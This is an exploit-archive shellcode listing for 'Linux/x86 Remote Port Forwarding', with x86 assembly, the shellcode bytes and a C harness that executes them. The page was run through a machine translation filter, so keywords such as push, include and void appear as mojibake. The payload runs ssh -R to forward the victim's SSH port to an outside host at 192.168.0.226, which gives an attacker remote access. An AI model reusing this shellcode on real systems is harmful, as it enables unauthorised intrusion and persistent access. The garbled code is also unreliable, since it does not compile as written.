Linux/x86 - Remote Port º£¸åing

¤³¤Î¥Ú¡¼¥¸¤ÏEtoJÃà¸ìËÝÌõ¥Õ¥£¥ë¥¿¤Ë¤è¤Ã¤ÆËÝÌõÀ¸À®¤µ¤ì¤Þ¤·¤¿¡£
Linux/x86 - Remote Port º£¸åing - 87 bytes
*****************************************************
* Linux/x86 Remote Port º£¸åing 87 bytes         *
* ssh -R 9999:localhost:22 192.168.0.226            *
*****************************************************
* Author: Hamza Megahed                             *
*****************************************************
* Twitter: @Hamza_Mega                              *
*****************************************************
* blog: hamza-mega[dot]blogspot[dot]com             *
*****************************************************
* E-mail: hamza[dot]megahed[at]gmail[dot]com        *
*****************************************************

xor    %eax,%eax
²¡¤·¿Ê¤á¤ë   %eax
pushl  $0x3632322e
pushl  $0x30302e38
pushl  $0x36312e32
pushw  $0x3931
movl   %esp,%esi
²¡¤·¿Ê¤á¤ë   %eax
²¡¤·¿Ê¤á¤ë   $0x32323a74
²¡¤·¿Ê¤á¤ë   $0x736f686c
²¡¤·¿Ê¤á¤ë   $0x61636f6c
²¡¤·¿Ê¤á¤ë   $0x3a393939
pushw  $0x3930
movl   %esp,%ebp
²¡¤·¿Ê¤á¤ë   %eax
pushw  $0x522d
movl   %esp,%edi
²¡¤·¿Ê¤á¤ë   %eax
²¡¤·¿Ê¤á¤ë   $0x6873732f
²¡¤·¿Ê¤á¤ë   $0x6e69622f
²¡¤·¿Ê¤á¤ë   $0x7273752f
movl   %esp,%ebx
²¡¤·¿Ê¤á¤ë   %eax
²¡¤·¿Ê¤á¤ë   %esi
²¡¤·¿Ê¤á¤ë   %ebp
²¡¤·¿Ê¤á¤ë   %edi
²¡¤·¿Ê¤á¤ë   %ebx
movl   %esp,%ecx
mov    $0xb,%al
int    $0x80

********************************
#´Þ¤à <stdio.h>
#´Þ¤à <string.h>
 
char *shellcode = 
"\x31\xc0\x50\x68\x2e\x32\x32\x36\x68\x38\x2e\x30\x30\x68\x32\x2e\x31\x36"
"\x66\x68\x31\x39\x89\xe6\x50\x68\x74\x3a\x32\x32\x68\x6c\x68\x6f\x73\x68"
"\x6c\x6f\x63\x61\x68\x39\x39\x39\x3a\x66\x68\x30\x39\x89\xe5\x50\x66\x68"
"\x2d\x52\x89\xe7\x50\x68\x2f\x73\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75"
"\x73\x72\x89\xe3\x50\x56\x55\x57\x53\x89\xe1\xb0\x0b\xcd\x80";



 
int main(Ìµ¸ú¤Î)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(Ìµ¸ú¤Î(*)()) shellcode)();
return 0;
}